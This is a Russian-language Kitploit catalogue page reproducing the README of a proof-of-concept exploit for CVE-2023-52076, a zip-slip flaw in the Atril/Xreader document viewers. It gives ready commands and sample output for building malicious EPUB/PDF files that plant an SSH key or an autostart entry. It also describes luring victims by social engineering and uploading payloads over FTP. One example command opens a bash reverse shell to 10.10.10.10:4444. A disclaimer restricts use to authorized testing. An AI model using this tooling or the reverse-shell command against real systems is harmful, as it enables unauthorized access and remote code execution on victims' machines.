Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-52076-PoC — PoC-эксплойт для CVE-2023-52076 — zip-slip обход пути в Atril/Xreader (MATE/Cinnamon), который позволяет произвольную запись файлов и RCE через специально созданный EPUB. Только для авторизованного тестирования безопасности. | Kitploit
Инструменты/GitHubGitHub/groppoxx/cve-2023-52076-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеСоциальная инженерияЭксплуатация Бинарных Файлов
GitHubgroppoxx/cve-2023-52076-poc

CVE-2023-52076-PoC

PoC-эксплойт для CVE-2023-52076 — zip-slip обход пути в Atril/Xreader (MATE/Cinnamon), который позволяет произвольную запись файлов и RCE через специально созданный EPUB. Только для авторизованного тестирования безопасности.

Репозиторий
3192 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-52076-PoC

Концепт-эксплойт (Proof-of-concept) для CVE-2023-52076 — критической уязвимости обхода пути и произвольной записи файлов в программах просмотра документов Atril/Xreader, затрагивающей окружения рабочего стола MATE.

Скрипт создаёт специально сформированную EPUB-нагрузку с путями zip-slip, нацеленными либо на конфигурацию SSH, либо на записи автозапуска рабочего стола, что позволяет выполнять удалённые команды на целевых системах.

Что делает

  1. Поддерживает два режима эксплуатации: внедрение SSH-ключа или RCE через автозапуск.
  2. Генерирует пару RSA-ключей (только для режима SSH).
  3. Собирает корректный EPUB со встроенными путями zip-slip, нацеленными на уязвимую распаковку.
  4. Записывает нагрузку в 5-9 вариантов путей обхода с использованием приёмов /proc/self/cwd.
  5. Создаёт копии .epub и .pdf (обе приводят к срабатыванию уязвимости).
  6. Проверяет структуру нагрузки и верифицирует все записи.
  7. При необходимости загружает нагрузку через анонимный FTP.

Требования

Python 3.8+
ssh-keygen in PATH (SSH mode only)

Быстрый старт

Режим SSH (рекомендуется)

Сгенерируйте SSH-нагрузку локально:

python3 cve_2023_52076.py --mode ssh

Режим автозапуска

Сгенерируйте нагрузку RCE для автозапуска с произвольной командой:

python3 cve_2023_52076.py --mode autostart --command "id > /tmp/pwned.txt"

Полный пример

Режим SSH с загрузкой по FTP

python3 cve_2023_52076.py \
  --mode ssh \
  --name slippy-ssh \
  --key ./keys/atril_rsa \
  --output-dir ./payloads \
  --upload \
  --host ftp.target.local \
  --ftp-dir pub

Пример вывода:

[2026-07-27T14:23:45Z] [*] Generating RSA-3072 keypair: ./keys/atril_rsa
[2026-07-27T14:23:47Z] [*] Building EPUB with 9 zip-slip entries
[2026-07-27T14:23:47Z] [*] Validating payload: ./payloads/slippy-ssh.epub
[2026-07-27T14:23:47Z] [+] Validated 9 payload entries
[2026-07-27T14:23:47Z] [*] Connecting to FTP ftp.target.local:21
[2026-07-27T14:23:48Z] [*] Uploading ./payloads/slippy-ssh.epub as slippy-ssh.epub
[2026-07-27T14:23:48Z] [+] Upload complete. Remote directory listing:
-rw-r--r-- 1 0 0 2048 Jul 27 14:23 slippy-ssh.epub

[+] Payload ready
Mode:        SSH (authorized_keys)
Private key: ./keys/atril_rsa (mode 600)
Public key:  ./keys/atril_rsa.pub
Fingerprint: 3072 SHA256:abcd1234... atril-poc (RSA)
EPUB:        ./payloads/slippy-ssh.epub
PDF copy:    ./payloads/slippy-ssh.pdf

[+] SSH login remains manual:
    ssh -i ./keys/atril_rsa -o IdentitiesOnly=yes <user>@<target>

Режим автозапуска с загрузкой по FTP

python3 cve_2023_52076.py \
  --mode autostart \
  --command "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1" \
  --name slippy-rce \
  --output-dir ./payloads \
  --upload \
  --host ftp.target.local \
  --ftp-dir pub

Пример вывода:

[2026-07-27T14:25:10Z] [*] Building EPUB with 5 zip-slip entries
[2026-07-27T14:25:10Z] [*] Validating payload: ./payloads/slippy-rce.epub
[2026-07-27T14:25:10Z] [+] Validated 5 payload entries
[2026-07-27T14:25:10Z] [*] Connecting to FTP ftp.target.local:21
[2026-07-27T14:25:11Z] [*] Uploading ./payloads/slippy-rce.epub as slippy-rce.epub
[2026-07-27T14:25:11Z] [+] Upload complete.

[+] Payload ready
Mode:       Autostart (.desktop RCE)
Command:    bash -i >& /dev/tcp/10.10.10.10/4444 0>&1
EPUB:       ./payloads/slippy-rce.epub
PDF copy:   ./payloads/slippy-rce.pdf

[+] Victim must logout/login for autostart to trigger

Необязательные флаги

--mode {ssh,autostart}
   Payload mode. Default: ssh
   ssh: Inject SSH authorized_keys (no victim interaction needed after file opens).
   autostart: Create .desktop RCE in autostart (triggers on next logout/login).

--command <CMD>
   Payload command for --mode autostart. Required if --mode autostart.
   Example: --command "id > /tmp/pwned.txt"

--name <NAME>
   Local payload basename. Default: base-clean

--key <PATH>
   Private key path (SSH mode only). Default: slippy_rsa

--key-bits <BITS>
   RSA key size (SSH mode only). Options: 2048, 3072, 4096. Default: 3072

--output-dir <DIR>
   Output directory for .epub/.pdf. Default: output

--upload
   Upload the payload to FTP after generating.

--host <HOST>
   FTP target host or IP. Required if --upload is set.

--port <PORT>
   FTP port. Default: 21

--ftp-dir <DIR>
   Remote FTP directory, e.g. pub.

--ftp-user <USER>
   FTP username. Default: anonymous

--ftp-password <PWD>
   FTP password. Default: anonymous@

--remote-name <NAME>
   Remote EPUB filename. Default: ludwig.epub

--upload-pdf
   Upload the .pdf copy instead of the .epub.

--force
   Replace existing output and key files.

--timeout <SECONDS>
   FTP connection timeout. Default: 10.0

--only-final
   Hide progress logs and print only the final summary.

--no-color
   Disable ANSI colors.

--debug
   Print executed subprocess commands (ssh-keygen).

Ход эксплуатации

Режим SSH

  1. Создание нагрузки: скрипт создаёт EPUB с открытым ключом в путях authorized_keys.
  2. Социальная инженерия: отправьте EPUB/PDF цели (замаскировав под электронную книгу).
  3. Жертва открывает файл: Atril/Xreader извлекает содержимое EPUB.
  4. Обход пути: уязвимый код записывает открытый ключ в ~/.ssh/authorized_keys.
  5. Доступ по SSH: атакующий подключается с использованием закрытого ключа.

Режим автозапуска

  1. Создание нагрузки: скрипт создаёт EPUB с записью .desktop в путях автозапуска.
  2. Социальная инженерия: отправьте EPUB/PDF цели.
  3. Жертва открывает файл: Atril/Xreader извлекает содержимое EPUB.
  4. Обход пути: уязвимый код записывает .desktop в ~/.config/autostart/.
  5. Срабатывание: при следующем выходе из системы/входе файл .desktop автоматически выполняет команду.

Ключевые моменты

  • Имя пользователя не требуется: путь через /proc/self/cwd вычисляется во время извлечения.
  • Несколько вариантов путей: 9 путей для SSH и 5 для автозапуска — максимизирует успех при разной глубине каталогов.
  • Без перезаписи файлов: создаются только новые файлы (учитывая ограничение CVE).
  • Офлайн-режим: создавайте нагрузки без доставки по FTP (используйте --upload только при необходимости).
  • Гибкие команды: режим автозапуска поддерживает любую команду bash.
  • Режим SSH действует немедленно: после открытия файла взаимодействие с жертвой не требуется.
  • Автозапуск требует повторного входа: жертва должна выйти из системы и войти снова, чтобы сработал RCE.

Примечания

  • Затронутые версии: Atril (MATE DE), Xreader (Cinnamon, Linux Mint) < 1.26.2.
  • Протестировано на: Kali Linux, Parrot OS, Ubuntu-Mate, Xubuntu.
  • Требуется, чтобы жертва открыла сформированный документ в уязвимой программе просмотра.
  • Работает офлайн; во время эксплуатации не требуется обратного соединения с атакующим.
  • Рекомендация: доставляйте через FTP (--upload), чтобы избежать прямого размещения файла.

Правовая информация

Данный PoC предназначен для авторизованного тестирования безопасности, лабораторных сред и проверки уязвимостей. Не используйте его против систем без явного разрешения.

Скачать инструмент